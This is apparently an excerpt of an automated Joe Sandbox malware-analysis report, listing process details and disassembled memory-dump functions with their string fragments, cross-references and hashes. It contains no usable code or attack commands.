Wow64 process (32bit):	false
Commandline:	timeout /T 2 /NOBREAK
Imagebase:	0x7ff6cf1a0000
File size:	32'768 bytes
MD5 hash:	100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF848F311DB Relevance: 4.1, Strings: 2, Instructions: 1601COMMON

Download Yara Rule

Strings

(_CH, xrefs: 00007FF848F312BA
(_CH, xrefs: 00007FF848F313DE

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: (_CH$(_CH
API String ID: 0-1354399846
Opcode ID: e450eaddc66a763bc773d98e75562cbe83357d1cd708525156edc3f1ecb93448
Instruction ID: 859cbd75cf1ca6eb3581a7962b68f7cf6fa626b7a16c297e519097ca803e7466
Opcode Fuzzy Hash: e450eaddc66a763bc773d98e75562cbe83357d1cd708525156edc3f1ecb93448
Instruction Fuzzy Hash: 8DB2933060DA898FE789F72C84516B977E1EF9A394F1441FAD04DCB2E3CE2AAC418755

Function 00007FF848F3318D Relevance: 3.5, Strings: 2, Instructions: 1000COMMON

Download Yara Rule

Strings

]CH, xrefs: 00007FF848F33915
]CH, xrefs: 00007FF848F338E4

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: ]CH$]CH
API String ID: 0-590194512
Opcode ID: 6d4d4cb3994c0bb5ca760bd6a0597d1f4b6a8f58737fe0f9b9697d6443aa79cf
Instruction ID: 6db451122959d6d15f62823e0ebc1de70779e620f96a4a56a781d2985ed13a28
Opcode Fuzzy Hash: 6d4d4cb3994c0bb5ca760bd6a0597d1f4b6a8f58737fe0f9b9697d6443aa79cf
Instruction Fuzzy Hash: 42622330A0DA8A4FE786E72C98156A57BE1EF9A3A0F1441FBD04DCB1D3CE29AC41C755

Function 00007FF848F17EA6 Relevance: 3.0, Strings: 2, Instructions: 468COMMON

Download Yara Rule

Strings

&}`, xrefs: 00007FF848F1833B
&}`, xrefs: 00007FF848F17F18

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: &}`$&}`
API String ID: 0-3442511786
Opcode ID: 951a689eaa64086b57392093a57f1df605b06b64ebaf00f0e8e2723a9bef7c41
Instruction ID: 293c0984537dbc60e41622fd3af341fac59189c392b3da52c0ae3d1b2920db1c
Opcode Fuzzy Hash: 951a689eaa64086b57392093a57f1df605b06b64ebaf00f0e8e2723a9bef7c41
Instruction Fuzzy Hash: 3DF1A13091CA8D8FEBA8EF28C8557E977E1FF54350F44426AE84DC7295CB3899458B82

Function 00007FF848F18C52 Relevance: 3.0, Strings: 2, Instructions: 454COMMON

Download Yara Rule

Strings

&}`, xrefs: 00007FF848F18CC8
&}`, xrefs: 00007FF848F190B7

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: &}`$&}`
API String ID: 0-3442511786
Opcode ID: 07a55845cce502f6e642f8e684fb0d680191102cd89487924c505da584601758
Instruction ID: 2836b45a59f0704f736b6bd62e70acd6f480b2c4f0feb9822ac55cbe8bff3fe5
Opcode Fuzzy Hash: 07a55845cce502f6e642f8e684fb0d680191102cd89487924c505da584601758
Instruction Fuzzy Hash: 48E1B13091CA4E8FEBA8EF28C8557E977E1FB54350F54426AD84DC7295CF78A8418B81

Function 00007FF848F37A68 Relevance: 1.7, Instructions: 1702COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cd3d5d0d36bd6bee5fc1b2dbc4750ef7c404235c5a123dc54fd15063828176e
Instruction ID: efb26928c9075730dc2789ca7b5a12351dfa1d593ec742b8fa5830adf7a498f9
Opcode Fuzzy Hash: 5cd3d5d0d36bd6bee5fc1b2dbc4750ef7c404235c5a123dc54fd15063828176e
Instruction Fuzzy Hash: C8B2573062CA4A8FE31DFB1884815B473A1FBA1754F6446BEC98BC75D7EF24B8538684

Function 00007FF848F29231 Relevance: .7, Instructions: 703COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f17a87a1f264d190b070e7280bae14e3f451df6404a319de6bff006d6c5dbd
Instruction ID: 765ba7cf4af1768907a8b48700ce0cad20b961713782d64b00eaa0167bdecd6b
Opcode Fuzzy Hash: 13f17a87a1f264d190b070e7280bae14e3f451df6404a319de6bff006d6c5dbd
Instruction Fuzzy Hash: CF427F30A1AA498FE799EB78C451BA9B7B1FF49344F6041E9D00DDB293CE3D6884CB15

Function 00007FF848F371F0 Relevance: .4, Instructions: 419COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8b710f34e4a59b4f4f8e9b66ea0c3806f827bc4ad4017f90cf3ad408106554
Instruction ID: 4744b6936da0ead4e987a6944a6eb8cf7da3baeb8805d45e20933c4d2db45cea
Opcode Fuzzy Hash: bd8b710f34e4a59b4f4f8e9b66ea0c3806f827bc4ad4017f90cf3ad408106554
Instruction Fuzzy Hash: B1C11B30C9C75E4FE32BBB6489809B97691FF01718F684AB5C4EF468C7E61CA06342D8

Function 00007FF848F3DE01 Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf6742f203533af256e13154c7cc62597a720523834bc51d94d01496d5d4cc2c
Instruction ID: da2f804b226bdc6ec86b41cb34ab0a76fa9804d23a8ffa64ca057ed15da5b911
Opcode Fuzzy Hash: cf6742f203533af256e13154c7cc62597a720523834bc51d94d01496d5d4cc2c
Instruction Fuzzy Hash: A4B1F930CDC75E4EE32BBBB48984AB97251FF01718F580A79C4EB428C7E61DA06742D8

Function 00007FF848F10955 Relevance: 59.4, Strings: 47, Instructions: 651COMMON

Download Yara Rule

Strings

07CH, xrefs: 00007FF848F10CB5
H7CH, xrefs: 00007FF848F10D04
`CH, xrefs: 00007FF848F10B2B
X7CH, xrefs: 00007FF848F10D32
`CH, xrefs: 00007FF848F10E39
`CH, xrefs: 00007FF848F10B87
`CH, xrefs: 00007FF848F10D25
6CH, xrefs: 00007FF848F10BC2
`CH, xrefs: 00007FF848F10C3F
`CH, xrefs: 00007FF848F10B59
`CH, xrefs: 00007FF848F10DDD
@7CH, xrefs: 00007FF848F10CE3
`CH, xrefs: 00007FF848F10AFD
7CH, xrefs: 00007FF848F10C7A
`CH, xrefs: 00007FF848F10BB5
7CH, xrefs: 00007FF848F10CA8
`CH, xrefs: 00007FF848F10A45
p7CH, xrefs: 00007FF848F10D6D
7CH, xrefs: 00007FF848F10ED0
`CH, xrefs: 00007FF848F10DAF
P7CH, xrefs: 00007FF848F10D11
`CH, xrefs: 00007FF848F10C9B
`CH, xrefs: 00007FF848F10C6D
`CH, xrefs: 00007FF848F10ACF
`CH, xrefs: 00007FF848F10EC3
6CH, xrefs: 00007FF848F10BA1
`CH, xrefs: 00007FF848F10E0B
`7CH, xrefs: 00007FF848F10D3F
`CH, xrefs: 00007FF848F10A73
`CH, xrefs: 00007FF848F10AA1
`CH, xrefs: 00007FF848F10EF1
`CH, xrefs: 00007FF848F10D81
`CH, xrefs: 00007FF848F10E95
`CH, xrefs: 00007FF848F10E67
(7CH, xrefs: 00007FF848F10C87
87CH, xrefs: 00007FF848F10CD6
`CH, xrefs: 00007FF848F10CF7
`CH, xrefs: 00007FF848F10A32
x7CH, xrefs: 00007FF848F10D8E
7CH, xrefs: 00007FF848F10EAF
`CH, xrefs: 00007FF848F10D53
`CH, xrefs: 00007FF848F10BE3
`CH, xrefs: 00007FF848F10C11
h7CH, xrefs: 00007FF848F10D60
7CH, xrefs: 00007FF848F10EFE
`CH, xrefs: 00007FF848F10A03
`CH, xrefs: 00007FF848F10CC9

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: 7CH$ 7CH$(7CH$07CH$87CH$@7CH$H7CH$P7CH$X7CH$`7CH$h7CH$p7CH$x7CH$6CH$6CH$7CH$7CH$7CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH$`CH
API String ID: 0-3265165744
Opcode ID: 276a0b35ac1072d19358f5322502576e71add8afedffe9c5eb92162a4fd8270a
Instruction ID: f2c18c562774e6b487234895997818d49cd04a67d24363e5a82eab8a9d6e98a7
Opcode Fuzzy Hash: 276a0b35ac1072d19358f5322502576e71add8afedffe9c5eb92162a4fd8270a
Instruction Fuzzy Hash: E122FC30609F999FD78ADB2CC6505107BB1EF4F79872584DAD008CF2A3CA3AAD95DB14

Function 00007FF848F1FD85 Relevance: 17.8, Strings: 14, Instructions: 305COMMON

Download Yara Rule

Strings

@8CH, xrefs: 00007FF848F1FF90
08CH, xrefs: 00007FF848F1FF47
@8CH, xrefs: 00007FF848F1FFB1
P8CH, xrefs: 00007FF848F1FFD9
P8CH, xrefs: 00007FF848F1FFFA
ZCH, xrefs: 00007FF848F1FEC6
08CH, xrefs: 00007FF848F1FF68
@[CH, xrefs: 00007FF848F1FF37
ZCH, xrefs: 00007FF848F1FED8
@[CH, xrefs: 00007FF848F1FF80
8\CH, xrefs: 00007FF848F1FE16
@[CH, xrefs: 00007FF848F1FFC9
0[CH, xrefs: 00007FF848F1FF0E
(8CH, xrefs: 00007FF848F1FF1B

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: (8CH$08CH$08CH$0[CH$8\CH$@8CH$@8CH$@[CH$@[CH$@[CH$P8CH$P8CH$ZCH$ZCH
API String ID: 0-628040324
Opcode ID: acfb4b26ffa669f64487975123ec1488c0236deeaa186556e1f8bc2a52668e92
Instruction ID: 1b2090922d9ba108b1a3ae44754c3df9af59f2913e42c0424e14f309a5351852
Opcode Fuzzy Hash: acfb4b26ffa669f64487975123ec1488c0236deeaa186556e1f8bc2a52668e92
Instruction Fuzzy Hash: E7A1E53060DB8A4FD78AEB78C8106A57BE1EF4F354B1544EAD049CB2A3CA3E9D46C751

Function 00007FF848F1A868 Relevance: 16.9, Strings: 13, Instructions: 625COMMON

Download Yara Rule

Strings

@\CH, xrefs: 00007FF848F1ADBD
0[CH, xrefs: 00007FF848F1AD1A
([CH, xrefs: 00007FF848F1AC80
(8CH, xrefs: 00007FF848F1AD27
@\CH, xrefs: 00007FF848F1A97A
H\CH, xrefs: 00007FF848F1ADCA
(8CH, xrefs: 00007FF848F1AC65
(8CH, xrefs: 00007FF848F1AC8D
(8CH, xrefs: 00007FF848F1ACB0
(8CH, xrefs: 00007FF848F1AA39
H\CH, xrefs: 00007FF848F1A987
ZCH, xrefs: 00007FF848F1A9A6
(8CH, xrefs: 00007FF848F1AD4A

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: (8CH$(8CH$(8CH$(8CH$(8CH$(8CH$([CH$0[CH$@\CH$@\CH$H\CH$H\CH$ZCH
API String ID: 0-3366381599
Opcode ID: 55199b5f6a6c1916e3c8d285c59bfde591091d8e586965b265e954dfc4f75b3c
Instruction ID: 3b1cc3541e48815af17fc7b20da3f40be59d0326a03d73777cc543b9e4004e4d
Opcode Fuzzy Hash: 55199b5f6a6c1916e3c8d285c59bfde591091d8e586965b265e954dfc4f75b3c
Instruction Fuzzy Hash: 3122083060DA4A8FDB89EF28C4506A577A1FF8A394F1446B9D419CB2D7CF39AC85CB50

Function 00007FF848F45617 Relevance: 12.8, Strings: 10, Instructions: 262COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848F6B931
h&DH, xrefs: 00007FF848F6BA03
X&DH, xrefs: 00007FF848F6BAF5
H, xrefs: 00007FF848F6B95D
P&DH, xrefs: 00007FF848F6BBC3
`&DH, xrefs: 00007FF848F6BBDA
x6CH, xrefs: 00007FF848F6B588
P&DH, xrefs: 00007FF848F6B730
P&DH, xrefs: 00007FF848F6BADE
h&DH, xrefs: 00007FF848F6B9EF

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: P&DH$P&DH$P&DH$X&DH$`&DH$h&DH$h&DH$x6CH$H$H
API String ID: 0-2351487891
Opcode ID: 00bd50385e297f8d836bec294c3569fb02009171575a367bb4feea60ee2d6f54
Instruction ID: 85b56a6ebf24d85153a8163a3a868959da4c5d004796724a38c9c9448299fe15
Opcode Fuzzy Hash: 00bd50385e297f8d836bec294c3569fb02009171575a367bb4feea60ee2d6f54
Instruction Fuzzy Hash: 59717831A0DA464FE754BB2CA4442B577D1EFA9BA0F0402B7D44DDB1C7EF28AC428388

Function 00007FF848F5CC25 Relevance: 11.6, Strings: 9, Instructions: 328COMMON

Download Yara Rule

Strings

"\I, xrefs: 00007FF848F5CED6
b\I, xrefs: 00007FF848F5CCB2
"\I, xrefs: 00007FF848F5CD5B
"\I, xrefs: 00007FF848F5CE83
"\I, xrefs: 00007FF848F5CDA5
"\I, xrefs: 00007FF848F5CE39
"\I, xrefs: 00007FF848F5CCCA
"\I, xrefs: 00007FF848F5CDEF
"\I, xrefs: 00007FF848F5CD11

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: "\I$"\I$"\I$"\I$"\I$"\I$"\I$"\I$b\I
API String ID: 0-3872022666
Opcode ID: 6ac5d7eda14e0e4291d22bc0f58dcbfe732285aa3b68cfde1a2ff2b2c1f7eff8
Instruction ID: 14cc2162a73412a3173c49dcf487bdb1a8664af259c39c9f6ece1a2dbd77cafb
Opcode Fuzzy Hash: 6ac5d7eda14e0e4291d22bc0f58dcbfe732285aa3b68cfde1a2ff2b2c1f7eff8
Instruction Fuzzy Hash: 15B1E030E0DA4A9FE785EBA898557EDBBF1FF69350F1401BAC00DD3187EE2828418755

Function 00007FF848F36042 Relevance: 10.7, Strings: 8, Instructions: 725COMMON

Download Yara Rule

Strings

JH, xrefs: 00007FF848F364A7
JH, xrefs: 00007FF848F36309
HAH, xrefs: 00007FF848F364E9
ZCH, xrefs: 00007FF848F360ED
(JH, xrefs: 00007FF848F365B9
`\CH, xrefs: 00007FF848F3644F
HAH, xrefs: 00007FF848F36500
JH, xrefs: 00007FF848F3627C

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: JH$(JH$HAH$HAH$`\CH$JH$JH$ZCH
API String ID: 0-3301056602
Opcode ID: 3c6919609ac276c8c6ee23713ff9627977aad0472466f8f1418b400cfd33c97b
Instruction ID: 679f3fa4eb3d825fc08de5f37e28f8905a18adf3b145f15fe50618c772eaf6c5
Opcode Fuzzy Hash: 3c6919609ac276c8c6ee23713ff9627977aad0472466f8f1418b400cfd33c97b
Instruction Fuzzy Hash: AF22F43071DB498FE789BB2C941566577E1EF9A784F2441BAE009CB2D3CE2DAC41831A

Function 00007FF848F359B9 Relevance: 7.8, Strings: 6, Instructions: 349COMMON

Download Yara Rule

Strings

8JH, xrefs: 00007FF848F35AAB
@JH, xrefs: 00007FF848F35ADA
HJH, xrefs: 00007FF848F35B01
`JH, xrefs: 00007FF848F35BF1
PJH, xrefs: 00007FF848F35B2B
XJH, xrefs: 00007FF848F35B55

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: 8JH$@JH$HJH$PJH$XJH$`JH
API String ID: 0-2161849368
Opcode ID: 286badc6d4518f2139e6127b61832937866d170b93fcd2736ee69146f94ee738
Instruction ID: 54cacf180525c9945961cc06c5c184c7412e99e98defea39d67e3033a97b23c4
Opcode Fuzzy Hash: 286badc6d4518f2139e6127b61832937866d170b93fcd2736ee69146f94ee738
Instruction Fuzzy Hash: 65B14B30A0D6498FEB49A72898516A577E1EF8A394F1402FAD40CCB1D3DE29BC4587A9

Function 00007FF848F35A73 Relevance: 7.8, Strings: 6, Instructions: 277COMMON

Download Yara Rule

Strings

8JH, xrefs: 00007FF848F35AAB
@JH, xrefs: 00007FF848F35ADA
HJH, xrefs: 00007FF848F35B01
`JH, xrefs: 00007FF848F35BF1
PJH, xrefs: 00007FF848F35B2B
XJH, xrefs: 00007FF848F35B55

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: 8JH$@JH$HJH$PJH$XJH$`JH
API String ID: 0-2161849368
Opcode ID: d01dd9bda4124e132cdc470c0ec0cdb427e57564682f3844398b16b552fa8698
Instruction ID: 69ef71654463dae04a4fc07bd4655160fb2dbf4eea31cba3d3377c0f9e2b552a
Opcode Fuzzy Hash: d01dd9bda4124e132cdc470c0ec0cdb427e57564682f3844398b16b552fa8698
Instruction Fuzzy Hash: C581163060E6498FE749AB6C98416A577E1EF8A394F1402FAE40CCB1D3DE2DBC45C769

Function 00007FF848F13B86 Relevance: 6.7, Strings: 5, Instructions: 494COMMON

Download Yara Rule

Strings

`\CH, xrefs: 00007FF848F13BCB
p\CH, xrefs: 00007FF848F13C60
h\CH, xrefs: 00007FF848F13C15
x6CH, xrefs: 00007FF848F13FA7
x\CH, xrefs: 00007FF848F13CCD

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: `\CH$h\CH$p\CH$x6CH$x\CH
API String ID: 0-1690419357
Opcode ID: eccba0becb35cbab6f29036cfe680996f2b83ce13cd1b337b21abd025e930863
Instruction ID: c8d3eda308a053d42051da14d7b2e59efb7cf53cae513c9343675564dbe4f436
Opcode Fuzzy Hash: eccba0becb35cbab6f29036cfe680996f2b83ce13cd1b337b21abd025e930863
Instruction Fuzzy Hash: 50F1D230A0EA8A8FE785EB7C84152A97BE1FF5A354F1541FAD048CB1E3DE2DAC058715

Function 00007FF848F35A64 Relevance: 6.5, Strings: 5, Instructions: 259COMMON

Download Yara Rule

Strings

@JH, xrefs: 00007FF848F35ADA
HJH, xrefs: 00007FF848F35B01
`JH, xrefs: 00007FF848F35BF1
PJH, xrefs: 00007FF848F35B2B
XJH, xrefs: 00007FF848F35B55

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: @JH$HJH$PJH$XJH$`JH
API String ID: 0-3187244962
Opcode ID: e5fe0aaf39ec364c60dadb92a1cbbab591107e8e3f1edfbf2c94f8aebe9537ab
Instruction ID: afc1919dfb4eaa52a21d4457bdafdc5e9bba838b63477f1ed817869b994246cc
Opcode Fuzzy Hash: e5fe0aaf39ec364c60dadb92a1cbbab591107e8e3f1edfbf2c94f8aebe9537ab
Instruction Fuzzy Hash: 13712A3060E6499FE709A76C98416A577E1EF8B394F2402FAE44CCB1D3DE2DBC058369

Function 00007FF848F27E11 Relevance: 5.2, Strings: 4, Instructions: 216COMMON

Download Yara Rule

Strings

x]CH, xrefs: 00007FF848F27EA4
(_CH, xrefs: 00007FF848F27E3B
x]CH, xrefs: 00007FF848F27EC7
x]CH, xrefs: 00007FF848F27E5A

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: (_CH$x]CH$x]CH$x]CH
API String ID: 0-1919544229
Opcode ID: 3f26f48515426de84ccf361c78b856ac92188586fd258201f9b39470be9ed604
Instruction ID: 6d92427cbd43f65da05d30670208de613595430a7a9f710c084802a2123557dc
Opcode Fuzzy Hash: 3f26f48515426de84ccf361c78b856ac92188586fd258201f9b39470be9ed604
Instruction Fuzzy Hash: 3851253090DE894FDB95EB3898115A57BE1EF8B394F1900EBC448CB1E3CA2E6C598761

Function 00007FF848F1A891 Relevance: 5.2, Strings: 4, Instructions: 205COMMON

Download Yara Rule

Strings

@\CH, xrefs: 00007FF848F1A97A
(8CH, xrefs: 00007FF848F1AA39
H\CH, xrefs: 00007FF848F1A987
ZCH, xrefs: 00007FF848F1A9A6

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: (8CH$@\CH$H\CH$ZCH
API String ID: 0-525735304
Opcode ID: 39bfe8587dbe6a7575863a5a2163fa210d778becdae92b27f00999dae4be2d90
Instruction ID: 44f8ad986b026cb9b8cd89f7f256fbdf1497cccca3154a55a33cf1846ed2f92f
Opcode Fuzzy Hash: 39bfe8587dbe6a7575863a5a2163fa210d778becdae92b27f00999dae4be2d90
Instruction Fuzzy Hash: 0261C03060D6868FE789FB3885106A53BA1EF8B394F1441B9D449CB2D3DF29AC85C766

Function 00007FF848F42C72 Relevance: 4.4, Strings: 3, Instructions: 633COMMON

Download Yara Rule

Strings

@#DH, xrefs: 00007FF848F42F48
(#DH, xrefs: 00007FF848F42D19
H#DH, xrefs: 00007FF848F42F72

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: (#DH$@#DH$H#DH
API String ID: 0-2125861448
Opcode ID: 6b39bb56d4e29c57125dee83568b98c1c8e85e6f30b6995c78cd641ee54020ff
Instruction ID: c14e430b6abde578d410887aeef9efb91ef39b16c4388c07c2413d11d85b9b7c
Opcode Fuzzy Hash: 6b39bb56d4e29c57125dee83568b98c1c8e85e6f30b6995c78cd641ee54020ff
Instruction Fuzzy Hash: C722593190D68A8FD756EB68C8116E97BB0FFA6350F0402BBD449DB1D3DB39A806C791

Function 00007FF848F1ED11 Relevance: 4.2, Strings: 3, Instructions: 442COMMON

Download Yara Rule

Strings

x6CH, xrefs: 00007FF848F1EE2B
x6CH, xrefs: 00007FF848F1F056
x6CH, xrefs: 00007FF848F1EE86

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: x6CH$x6CH$x6CH
API String ID: 0-1168066917
Opcode ID: 17c9ffbd4f9e895e42eda786e43a61c4d559a1a5185e02eda1633e98d35af00a
Instruction ID: 810e86e66c6d5c3d9791f124babcdb130cbd6c5f86d10c5f4ff1d0451715b292
Opcode Fuzzy Hash: 17c9ffbd4f9e895e42eda786e43a61c4d559a1a5185e02eda1633e98d35af00a
Instruction Fuzzy Hash: 94E1AE30A1CA4A8FE795FB28C4156B9B7E2EF8A394F1144B9D84DC72D2CF39AC418745

Function 00007FF848F449FA Relevance: 4.2, Strings: 3, Instructions: 438COMMON

Download Yara Rule

Strings

`#DH, xrefs: 00007FF848F44D2A
X#DH, xrefs: 00007FF848F44C6D
P#DH, xrefs: 00007FF848F44C60

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: P#DH$X#DH$`#DH
API String ID: 0-3575568515
Opcode ID: 7da03f7b1a0de8a6e0dd34d18f692b484ea48236552fc80bf17e894ee1ad4f05
Instruction ID: 3db07d549d46d9750f9bbb01509fe602cd25be490a940fec5d0c8a6a452d6ee6
Opcode Fuzzy Hash: 7da03f7b1a0de8a6e0dd34d18f692b484ea48236552fc80bf17e894ee1ad4f05
Instruction Fuzzy Hash: B5D13A31A0DA498FEB48EB1CD8516E977E1FFA9754F0401BBD40DD72C6CE28A8068795

Function 00007FF848F33BE8 Relevance: 4.1, Strings: 3, Instructions: 396COMMON

Download Yara Rule

Strings

xJH, xrefs: 00007FF848F35E44
x, xrefs: 00007FF848F35DC7
pJH, xrefs: 00007FF848F35DE4

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: pJH$x$xJH
API String ID: 0-3816644130
Opcode ID: 0c448e6503fe5cb78cd1a2288a93586ac7680833ba348dde1a8f7597eee2d92c
Instruction ID: 5f0a0aa2ef8f930f9a88b579ca8e85281d54def53b0787fe6f7b9b08c68f0d14
Opcode Fuzzy Hash: 0c448e6503fe5cb78cd1a2288a93586ac7680833ba348dde1a8f7597eee2d92c
Instruction Fuzzy Hash: 33D1D230A1E6498FE745FB6CD4556A9B7E2FF99344F2441BAE00CCB2D3CE28AC418755

Function 00007FF848F1366A Relevance: 4.1, Strings: 3, Instructions: 395COMMON

Download Yara Rule

Strings

_CH, xrefs: 00007FF848F13B30
0_CH, xrefs: 00007FF848F13B68
(_CH, xrefs: 00007FF848F13B4C

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: _CH$(_CH$0_CH
API String ID: 0-2096838371
Opcode ID: 56ca0284a08d5c285d3df7a641765072a75b0e3f75fa462d3339661639cd736d
Instruction ID: ee969d611effd630cb99ca7ab00d33663522cf1147a226b67255d77b1a6c3bc5
Opcode Fuzzy Hash: 56ca0284a08d5c285d3df7a641765072a75b0e3f75fa462d3339661639cd736d
Instruction Fuzzy Hash: C2E14D70D1995A9FEB95EB2898A97E9B7B1FF58340F1001F5D40CD3292DF382E818B15

